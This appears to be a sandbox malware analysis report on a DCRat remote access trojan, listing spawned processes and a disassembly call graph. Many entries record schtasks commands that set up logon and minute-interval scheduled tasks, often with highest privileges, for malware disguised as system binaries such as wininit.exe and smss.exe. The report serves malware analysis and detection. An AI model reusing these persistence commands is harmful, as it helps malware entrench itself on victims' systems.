                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:20
                Start time:07:37:03
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 6 /tr "'C:\ReviewHost\AFKwztugVSPq.exe'" /rl HIGHEST /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:21
                Start time:07:37:03
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 13 /tr "'C:\Windows\Containers\serviced\wininit.exe'" /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:22
                Start time:07:37:03
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Windows\Containers\serviced\wininit.exe'" /rl HIGHEST /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:23
                Start time:07:37:03
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 13 /tr "'C:\Windows\Containers\serviced\wininit.exe'" /rl HIGHEST /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:24
                Start time:07:37:03
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 10 /tr "'C:\Users\Public\AFKwztugVSPq.exe'" /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:25
                Start time:07:37:03
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "AFKwztugVSPq" /sc ONLOGON /tr "'C:\Users\Public\AFKwztugVSPq.exe'" /rl HIGHEST /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:26
                Start time:07:37:03
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 11 /tr "'C:\Users\Public\AFKwztugVSPq.exe'" /rl HIGHEST /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:27
                Start time:07:37:03
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "smsss" /sc MINUTE /mo 9 /tr "'C:\Recovery\smss.exe'" /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:28
                Start time:07:37:03
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Recovery\smss.exe'" /rl HIGHEST /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:29
                Start time:07:37:03
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "smsss" /sc MINUTE /mo 6 /tr "'C:\Recovery\smss.exe'" /rl HIGHEST /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:30
                Start time:07:37:03
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\Recent\AFKwztugVSPq.exe'" /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:31
                Start time:07:37:04
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "AFKwztugVSPq" /sc ONLOGON /tr "'C:\Users\Default User\Recent\AFKwztugVSPq.exe'" /rl HIGHEST /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:32
                Start time:07:37:04
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\Recent\AFKwztugVSPq.exe'" /rl HIGHEST /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:33
                Start time:07:37:04
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 11 /tr "'C:\Users\Public\Videos\AFKwztugVSPq.exe'" /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:34
                Start time:07:37:04
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "AFKwztugVSPq" /sc ONLOGON /tr "'C:\Users\Public\Videos\AFKwztugVSPq.exe'" /rl HIGHEST /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:35
                Start time:07:37:04
                Start date:19/04/2024
                Path:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exe
                Wow64 process (32bit):false
                Commandline:"C:\Users\Default User\Recent\AFKwztugVSPq.exe"
                Imagebase:0x1d0000
                File size:848'384 bytes
                MD5 hash:96B975481850ADD8CCB0353227ECEB87
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000023.00000002.2214435641.0000000002531000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000023.00000002.2214435641.0000000002527000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000023.00000002.2214435641.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Antivirus matches:
                • Detection: 88%, ReversingLabs
                • Detection: 79%, Virustotal, Browse
                Has exited:true

                General

                Target ID:36
                Start time:07:37:04
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 7 /tr "'C:\Users\Public\Videos\AFKwztugVSPq.exe'" /rl HIGHEST /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:37
                Start time:07:37:04
                Start date:19/04/2024
                Path:C:\Users\Public\Videos\AFKwztugVSPq.exe
                Wow64 process (32bit):false
                Commandline:C:\Users\Public\Videos\AFKwztugVSPq.exe
                Imagebase:0x7e0000
                File size:848'384 bytes
                MD5 hash:96B975481850ADD8CCB0353227ECEB87
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000025.00000002.2214490270.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Antivirus matches:
                • Detection: 88%, ReversingLabs
                • Detection: 79%, Virustotal, Browse
                Has exited:true

                General

                Target ID:38
                Start time:07:37:04
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "cscriptc" /sc MINUTE /mo 8 /tr "'C:\Users\Default User\Start Menu\Programs\System Tools\cscript.exe'" /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:39
                Start time:07:37:04
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "cscript" /sc ONLOGON /tr "'C:\Users\Default User\Start Menu\Programs\System Tools\cscript.exe'" /rl HIGHEST /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:41
                Start time:07:37:04
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "cscriptc" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Start Menu\Programs\System Tools\cscript.exe'" /rl HIGHEST /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Disassembly

                Reset < >

                  Execution Graph

                  Execution Coverage:9.6%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:9.3%
                  Total number of Nodes:1477
                  Total number of Limit Nodes:31
                  execution_graph 24862 f4ebf7 20 API calls 23042 f4e1f9 23043 f4e203 23042->23043 23046 f4df59 23043->23046 23074 f4dc67 23046->23074 23048 f4df73 23049 f4dfd0 23048->23049 23058 f4dff4 23048->23058 23050 f4ded7 DloadReleaseSectionWriteAccess 11 API calls 23049->23050 23051 f4dfdb RaiseException 23050->23051 23052 f4e1c9 23051->23052 23054 f4ec4a TranslatorGuardHandler 5 API calls 23052->23054 23053 f4e06c LoadLibraryExA 23055 f4e0cd 23053->23055 23056 f4e07f GetLastError 23053->23056 23057 f4e1d8 23054->23057 23059 f4e0d8 FreeLibrary 23055->23059 23062 f4e0df 23055->23062 23060 f4e092 23056->23060 23061 f4e0a8 23056->23061 23058->23053 23058->23055 23058->23062 23069 f4e19b 23058->23069 23059->23062 23060->23055 23060->23061 23064 f4ded7 DloadReleaseSectionWriteAccess 11 API calls 23061->23064 23063 f4e13d GetProcAddress 23062->23063 23062->23069 23065 f4e14d GetLastError 23063->23065 23063->23069 23066 f4e0b3 RaiseException 23064->23066 23067 f4e160 23065->23067 23066->23052 23067->23069 23070 f4ded7 DloadReleaseSectionWriteAccess 11 API calls 23067->23070 23085 f4ded7 23069->23085 23071 f4e181 RaiseException 23070->23071 23072 f4dc67 ___delayLoadHelper2@8 11 API calls 23071->23072 23073 f4e198 23072->23073 23073->23069 23075 f4dc73 23074->23075 23076 f4dc99 23074->23076 23093 f4dd15 23075->23093 23076->23048 23079 f4dc94 23103 f4dc9a 23079->23103 23082 f4ec4a TranslatorGuardHandler 5 API calls 23083 f4df55 23082->23083 23083->23048 23084 f4df24 23084->23082 23086 f4dee9 23085->23086 23087 f4df0b 23085->23087 23088 f4dd15 DloadLock 8 API calls 23086->23088 23087->23052 23089 f4deee 23088->23089 23090 f4df06 23089->23090 23091 f4de67 DloadProtectSection 3 API calls 23089->23091 23112 f4df0f 8 API calls 2 library calls 23090->23112 23091->23090 23094 f4dc9a DloadLock 3 API calls 23093->23094 23095 f4dd2a 23094->23095 23096 f4ec4a TranslatorGuardHandler 5 API calls 23095->23096 23097 f4dc78 23096->23097 23097->23079 23098 f4de67 23097->23098 23099 f4de7c DloadObtainSection 23098->23099 23100 f4deb7 VirtualProtect 23099->23100 23101 f4de82 23099->23101 23111 f4dd72 VirtualQuery GetSystemInfo 23099->23111 23100->23101 23101->23079 23104 f4dca7 23103->23104 23105 f4dcab 23103->23105 23104->23084 23106 f4dcb3 GetModuleHandleW 23105->23106 23107 f4dcaf 23105->23107 23108 f4dcc9 GetProcAddress 23106->23108 23110 f4dcc5 23106->23110 23107->23084 23109 f4dcd9 GetProcAddress 23108->23109 23108->23110 23109->23110 23110->23084 23111->23100 23112->23087 24812 f514f8 RaiseException 23115 f4aee0 23116 f4aeea __EH_prolog 23115->23116 23278 f3130b 23116->23278 23119 f4af2c 23122 f4afa2 23119->23122 23123 f4af39 23119->23123 23182 f4af18 23119->23182 23120 f4b5cb 23350 f4cd2e 23120->23350 23129 f4b041 GetDlgItemTextW 23122->23129 23130 f4afbc 23122->23130 23125 f4af75 23123->23125 23126 f4af3e 23123->23126 23136 f4af96 KiUserCallbackDispatcher 23125->23136 23125->23182 23135 f3ddd1 53 API calls 23126->23135 23126->23182 23127 f4b5f7 23132 f4b600 SendDlgItemMessageW 23127->23132 23133 f4b611 GetDlgItem SendMessageW 23127->23133 23128 f4b5e9 SendMessageW 23128->23127 23129->23125 23131 f4b077 23129->23131 23134 f3ddd1 53 API calls 23130->23134 23137 f4b08f GetDlgItem 23131->23137 23276 f4b080 23131->23276 23132->23133 23368 f49da4 GetCurrentDirectoryW 23133->23368 23141 f4afde SetDlgItemTextW 23134->23141 23142 f4af58 23135->23142 23136->23182 23139 f4b0a4 SendMessageW SendMessageW 23137->23139 23140 f4b0c5 SetFocus 23137->23140 23139->23140 23146 f4b0d5 23140->23146 23161 f4b0ed 23140->23161 23147 f4afec 23141->23147 23388 f31241 SHGetMalloc 23142->23388 23143 f4b641 GetDlgItem 23144 f4b664 SetWindowTextW 23143->23144 23145 f4b65e 23143->23145 23369 f4a2c7 GetClassNameW 23144->23369 23145->23144 23150 f3ddd1 53 API calls 23146->23150 23155 f4aff9 GetMessageW 23147->23155 23147->23182 23154 f4b0df 23150->23154 23151 f4af5f 23156 f4af63 SetDlgItemTextW 23151->23156 23151->23182 23152 f4b56b 23157 f3ddd1 53 API calls 23152->23157 23389 f4cb5a 23154->23389 23160 f4b010 IsDialogMessageW 23155->23160 23155->23182 23156->23182 23162 f4b57b SetDlgItemTextW 23157->23162 23160->23147 23164 f4b01f TranslateMessage DispatchMessageW 23160->23164 23166 f3ddd1 53 API calls 23161->23166 23165 f4b58f 23162->23165 23164->23147 23167 f3ddd1 53 API calls 23165->23167 23169 f4b124 23166->23169 23170 f4b5b8 23167->23170 23168 f4b6af 23174 f4b6df 23168->23174 23178 f3ddd1 53 API calls 23168->23178 23175 f3400a _swprintf 51 API calls 23169->23175 23176 f3ddd1 53 API calls 23170->23176 23171 f4b0e6 23288 f3a04f 23171->23288 23173 f4bdf5 98 API calls 23173->23168 23181 f4bdf5 98 API calls 23174->23181 23219 f4b797 23174->23219 23179 f4b136 23175->23179 23176->23182 23186 f4b6c2 SetDlgItemTextW 23178->23186 23180 f4cb5a 16 API calls 23179->23180 23180->23171 23187 f4b6fa 23181->23187 23183 f4b847 23188 f4b850 EnableWindow 23183->23188 23189 f4b859 23183->23189 23184 f4b174 GetLastError 23185 f4b17f 23184->23185 23294 f4a322 SetCurrentDirectoryW 23185->23294 23191 f3ddd1 53 API calls 23186->23191 23195 f4b70c 23187->23195 23220 f4b731 23187->23220 23188->23189 23192 f4b876 23189->23192 23407 f312c8 GetDlgItem EnableWindow 23189->23407 23194 f4b6d6 SetDlgItemTextW 23191->23194 23200 f4b89d 23192->23200 23205 f4b895 SendMessageW 23192->23205 23193 f4b195 23198 f4b1ac 23193->23198 23199 f4b19e GetLastError 23193->23199 23194->23174 23405 f49635 32 API calls 23195->23405 23196 f4b78a 23201 f4bdf5 98 API calls 23196->23201 23204 f4b227 23198->23204 23209 f4b1c4 GetTickCount 23198->23209 23210 f4b237 23198->23210 23199->23198 23200->23182 23206 f3ddd1 53 API calls 23200->23206 23201->23219 23203 f4b86c 23408 f312c8 GetDlgItem EnableWindow 23203->23408 23204->23210 23213 f4b46c 23204->23213 23205->23200 23212 f4b8b6 SetDlgItemTextW 23206->23212 23207 f4b725 23207->23220 23217 f3400a _swprintf 51 API calls 23209->23217 23215 f4b407 23210->23215 23216 f4b24f GetModuleFileNameW 23210->23216 23211 f4b825 23406 f49635 32 API calls 23211->23406 23212->23182 23310 f312e6 GetDlgItem ShowWindow 23213->23310 23215->23125 23230 f3ddd1 53 API calls 23215->23230 23399 f3eb3a 80 API calls 23216->23399 23225 f4b1dd 23217->23225 23219->23183 23219->23211 23221 f3ddd1 53 API calls 23219->23221 23220->23196 23222 f4bdf5 98 API calls 23220->23222 23221->23219 23227 f4b75f 23222->23227 23223 f4b47c 23311 f312e6 GetDlgItem ShowWindow 23223->23311 23295 f3971e 23225->23295 23226 f4b844 23226->23183 23227->23196 23231 f4b768 DialogBoxParamW 23227->23231 23229 f4b275 23233 f3400a _swprintf 51 API calls 23229->23233 23234 f4b41b 23230->23234 23231->23125 23231->23196 23232 f4b486 23235 f3ddd1 53 API calls 23232->23235 23236 f4b297 CreateFileMappingW 23233->23236 23237 f3400a _swprintf 51 API calls 23234->23237 23239 f4b490 SetDlgItemTextW 23235->23239 23240 f4b2f9 GetCommandLineW 23236->23240 23241 f4b376 __vswprintf_c_l 23236->23241 23242 f4b439 23237->23242 23312 f312e6 GetDlgItem ShowWindow 23239->23312 23246 f4b30a 23240->23246 23244 f4b381 ShellExecuteExW 23241->23244 23255 f3ddd1 53 API calls 23242->23255 23243 f4b203 23247 f4b215 23243->23247 23248 f4b20a GetLastError 23243->23248 23269 f4b39e 23244->23269 23400 f4ab2e SHGetMalloc 23246->23400 23303 f39653 23247->23303 23248->23247 23249 f4b4a2 SetDlgItemTextW GetDlgItem 23252 f4b4d7 23249->23252 23253 f4b4bf GetWindowLongW SetWindowLongW 23249->23253 23313 f4bdf5 23252->23313 23253->23252 23254 f4b326 23401 f4ab2e SHGetMalloc 23254->23401 23255->23125 23259 f4b332 23402 f4ab2e SHGetMalloc 23259->23402 23260 f4b3e1 23260->23215 23266 f4b3f7 UnmapViewOfFile CloseHandle 23260->23266 23261 f4bdf5 98 API calls 23263 f4b4f3 23261->23263 23338 f4d0f5 23263->23338 23264 f4b33e 23403 f3ecad 80 API calls ___scrt_fastfail 23264->23403 23266->23215 23268 f4b355 MapViewOfFile 23268->23241 23269->23260 23272 f4b3cd Sleep 23269->23272 23271 f4bdf5 98 API calls 23275 f4b519 23271->23275 23272->23260 23272->23269 23273 f4b542 23404 f312c8 GetDlgItem EnableWindow 23273->23404 23275->23273 23277 f4bdf5 98 API calls 23275->23277 23276->23125 23276->23152 23277->23273 23279 f31314 23278->23279 23280 f3136d 23278->23280 23282 f3137a 23279->23282 23409 f3da98 62 API calls 2 library calls 23279->23409 23410 f3da71 GetWindowLongW SetWindowLongW 23280->23410 23282->23119 23282->23120 23282->23182 23284 f31336 23284->23282 23285 f31349 GetDlgItem 23284->23285 23285->23282 23286 f31359 23285->23286 23286->23282 23287 f3135f SetWindowTextW 23286->23287 23287->23282 23290 f3a059 23288->23290 23289 f3a113 23289->23184 23289->23185 23290->23289 23291 f3a0ea 23290->23291 23411 f3a207 23290->23411 23291->23289 23292 f3a207 9 API calls 23291->23292 23292->23289 23294->23193 23296 f39728 23295->23296 23297 f39792 CreateFileW 23296->23297 23298 f39786 23296->23298 23297->23298 23299 f397e4 23298->23299 23300 f3b66c 2 API calls 23298->23300 23299->23243 23301 f397cb 23300->23301 23301->23299 23302 f397cf CreateFileW 23301->23302 23302->23299 23304 f39677 23303->23304 23309 f39688 23303->23309 23305 f39683 23304->23305 23306 f3968a 23304->23306 23304->23309 23458 f39817 23305->23458 23463 f396d0 23306->23463 23309->23204 23310->23223 23311->23232 23312->23249 23314 f4bdff __EH_prolog 23313->23314 23315 f4b4e5 23314->23315 23478 f4aa36 23314->23478 23315->23261 23318 f4aa36 ExpandEnvironmentStringsW 23323 f4be36 _wcsrchr 23318->23323 23319 f4c11d SetWindowTextW 23319->23323 23323->23315 23323->23318 23323->23319 23325 f4bf0b SetFileAttributesW 23323->23325 23330 f4c2e7 GetDlgItem SetWindowTextW SendMessageW 23323->23330 23333 f4c327 SendMessageW 23323->23333 23482 f417ac CompareStringW 23323->23482 23483 f49da4 GetCurrentDirectoryW 23323->23483 23485 f3a52a 7 API calls 23323->23485 23486 f3a4b3 FindClose 23323->23486 23487 f4ab9a 76 API calls new 23323->23487 23488 f535de 23323->23488 23327 f4bfc5 GetFileAttributesW 23325->23327 23337 f4bf25 ___scrt_fastfail 23325->23337 23327->23323 23329 f4bfd7 DeleteFileW 23327->23329 23329->23323 23331 f4bfe8 23329->23331 23330->23323 23332 f3400a _swprintf 51 API calls 23331->23332 23334 f4c008 GetFileAttributesW 23332->23334 23333->23323 23334->23331 23335 f4c01d MoveFileW 23334->23335 23335->23323 23336 f4c035 MoveFileExW 23335->23336 23336->23323 23337->23323 23337->23327 23484 f3b4f7 52 API calls 2 library calls 23337->23484 23339 f4d0ff __EH_prolog 23338->23339 23512 f3fead 23339->23512 23341 f4d130 23516 f35c59 23341->23516 23343 f4d14e 23520 f37c68 23343->23520 23347 f4d1a1 23537 f37cfb 23347->23537 23349 f4b504 23349->23271 23351 f4cd38 23350->23351 24000 f49d1a 23351->24000 23354 f4cd45 GetWindow 23355 f4b5d1 23354->23355 23360 f4cd65 23354->23360 23355->23127 23355->23128 23356 f4cd72 GetClassNameW 24005 f417ac CompareStringW 23356->24005 23358 f4cd96 GetWindowLongW 23359 f4cdfa GetWindow 23358->23359 23361 f4cda6 SendMessageW 23358->23361 23359->23355 23359->23360 23360->23355 23360->23356 23360->23358 23360->23359 23361->23359 23362 f4cdbc GetObjectW 23361->23362 24006 f49d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23362->24006 23364 f4cdd3 24007 f49d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23364->24007 24008 f49f5d 8 API calls ___scrt_fastfail 23364->24008 23367 f4cde4 SendMessageW DeleteObject 23367->23359 23368->23143 23370 f4a30d 23369->23370 23371 f4a2e8 23369->23371 23375 f4a7c3 23370->23375 24011 f417ac CompareStringW 23371->24011 23373 f4a2fb 23373->23370 23374 f4a2ff FindWindowExW 23373->23374 23374->23370 23376 f4a7cd __EH_prolog 23375->23376 23377 f31380 82 API calls 23376->23377 23378 f4a7ef 23377->23378 24012 f31f4f 23378->24012 23381 f4a818 23383 f31951 126 API calls 23381->23383 23382 f4a809 23384 f31631 84 API calls 23382->23384 23386 f4a83a __vswprintf_c_l new 23383->23386 23385 f4a814 23384->23385 23385->23168 23385->23173 23386->23385 23387 f31631 84 API calls 23386->23387 23387->23385 23388->23151 23390 f4ac74 5 API calls 23389->23390 23391 f4cb66 GetDlgItem 23390->23391 23392 f4cbbc SendMessageW SendMessageW 23391->23392 23393 f4cb88 23391->23393 23394 f4cc17 SendMessageW SendMessageW SendMessageW 23392->23394 23395 f4cbf8 23392->23395 23398 f4cb93 ShowWindow SendMessageW SendMessageW 23393->23398 23396 f4cc6d SendMessageW 23394->23396 23397 f4cc4a SendMessageW 23394->23397 23395->23394 23396->23171 23397->23396 23398->23392 23399->23229 23400->23254 23401->23259 23402->23264 23403->23268 23404->23276 23405->23207 23406->23226 23407->23203 23408->23192 23409->23284 23410->23282 23412 f3a214 23411->23412 23413 f3a238 23412->23413 23414 f3a22b CreateDirectoryW 23412->23414 23432 f3a180 23413->23432 23414->23413 23416 f3a26b 23414->23416 23419 f3a27a 23416->23419 23424 f3a444 23416->23424 23418 f3a27e GetLastError 23418->23419 23419->23290 23422 f3a254 23422->23418 23423 f3a258 CreateDirectoryW 23422->23423 23423->23416 23423->23418 23445 f4e360 23424->23445 23427 f3a467 23429 f3b66c 2 API calls 23427->23429 23428 f3a494 23428->23419 23430 f3a47b 23429->23430 23430->23428 23431 f3a47f SetFileAttributesW 23430->23431 23431->23428 23447 f3a194 23432->23447 23435 f3b66c 23436 f3b679 23435->23436 23444 f3b683 23436->23444 23455 f3b806 CharUpperW 23436->23455 23438 f3b692 23456 f3b832 CharUpperW 23438->23456 23440 f3b6a1 23441 f3b6a5 23440->23441 23442 f3b71c GetCurrentDirectoryW 23440->23442 23457 f3b806 CharUpperW 23441->23457 23442->23444 23444->23422 23446 f3a451 SetFileAttributesW 23445->23446 23446->23427 23446->23428 23448 f4e360 23447->23448 23449 f3a1a1 GetFileAttributesW 23448->23449 23450 f3a1b2 23449->23450 23451 f3a189 23449->23451 23452 f3b66c 2 API calls 23450->23452 23451->23418 23451->23435 23453 f3a1c6 23452->23453 23453->23451 23454 f3a1ca GetFileAttributesW 23453->23454 23454->23451 23455->23438 23456->23440 23457->23444 23459 f39820 23458->23459 23462 f39824 23458->23462 23459->23309 23462->23459 23469 f3a12d 23462->23469 23464 f396fa 23463->23464 23465 f396dc 23463->23465 23466 f39719 23464->23466 23477 f36e3e 74 API calls 23464->23477 23465->23464 23467 f396e8 FindCloseChangeNotification 23465->23467 23466->23309 23467->23464 23470 f4e360 23469->23470 23471 f3a13a DeleteFileW 23470->23471 23472 f3984c 23471->23472 23473 f3a14d 23471->23473 23472->23309 23474 f3b66c 2 API calls 23473->23474 23475 f3a161 23474->23475 23475->23472 23476 f3a165 DeleteFileW 23475->23476 23476->23472 23477->23466 23479 f4aa40 23478->23479 23480 f4aaf3 ExpandEnvironmentStringsW 23479->23480 23481 f4ab16 23479->23481 23480->23481 23481->23323 23482->23323 23483->23323 23484->23337 23485->23323 23486->23323 23487->23323 23489 f58606 23488->23489 23490 f58613 23489->23490 23491 f5861e 23489->23491 23501 f58518 23490->23501 23493 f58626 23491->23493 23499 f5862f __dosmaperr 23491->23499 23494 f584de _free 20 API calls 23493->23494 23497 f5861b 23494->23497 23495 f58634 23508 f5895a 20 API calls __dosmaperr 23495->23508 23496 f58659 HeapReAlloc 23496->23497 23496->23499 23497->23323 23499->23495 23499->23496 23509 f571ad 7 API calls 2 library calls 23499->23509 23502 f58556 23501->23502 23506 f58526 __dosmaperr 23501->23506 23511 f5895a 20 API calls __dosmaperr 23502->23511 23503 f58541 RtlAllocateHeap 23505 f58554 23503->23505 23503->23506 23505->23497 23506->23502 23506->23503 23510 f571ad 7 API calls 2 library calls 23506->23510 23508->23497 23509->23499 23510->23506 23511->23505 23513 f3feba 23512->23513 23541 f31789 23513->23541 23515 f3fed2 23515->23341 23517 f3fead 23516->23517 23518 f31789 76 API calls 23517->23518 23519 f3fed2 23518->23519 23519->23343 23521 f37c72 __EH_prolog 23520->23521 23558 f3c827 23521->23558 23523 f37c8d 23564 f4e24a 23523->23564 23525 f37cb7 23570 f4440b 23525->23570 23528 f37ddf 23529 f37de9 23528->23529 23534 f37e53 23529->23534 23602 f3a4c6 23529->23602 23531 f37f06 23531->23347 23532 f37ec4 23532->23531 23608 f36dc1 74 API calls 23532->23608 23534->23532 23536 f3a4c6 8 API calls 23534->23536 23580 f3837f 23534->23580 23536->23534 23538 f37d09 23537->23538 23540 f37d10 23537->23540 23539 f41acf 84 API calls 23538->23539 23539->23540 23542 f3179f 23541->23542 23553 f317fa __vswprintf_c_l 23541->23553 23543 f317c8 23542->23543 23554 f36e91 74 API calls __vswprintf_c_l 23542->23554 23545 f31827 23543->23545 23548 f317e7 new 23543->23548 23547 f535de 22 API calls 23545->23547 23546 f317be 23555 f36efd 75 API calls 23546->23555 23550 f3182e 23547->23550 23548->23553 23556 f36efd 75 API calls 23548->23556 23550->23553 23557 f36efd 75 API calls 23550->23557 23553->23515 23554->23546 23555->23543 